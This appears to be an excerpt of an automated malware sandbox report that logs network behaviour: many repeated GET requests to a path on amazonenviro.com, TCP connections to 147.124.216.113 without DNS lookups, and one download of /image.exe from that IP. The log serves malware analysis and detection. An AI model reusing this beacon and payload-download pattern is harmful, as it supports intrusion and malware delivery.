            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
            Source: global trafficHTTP traffic detected: GET /image.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
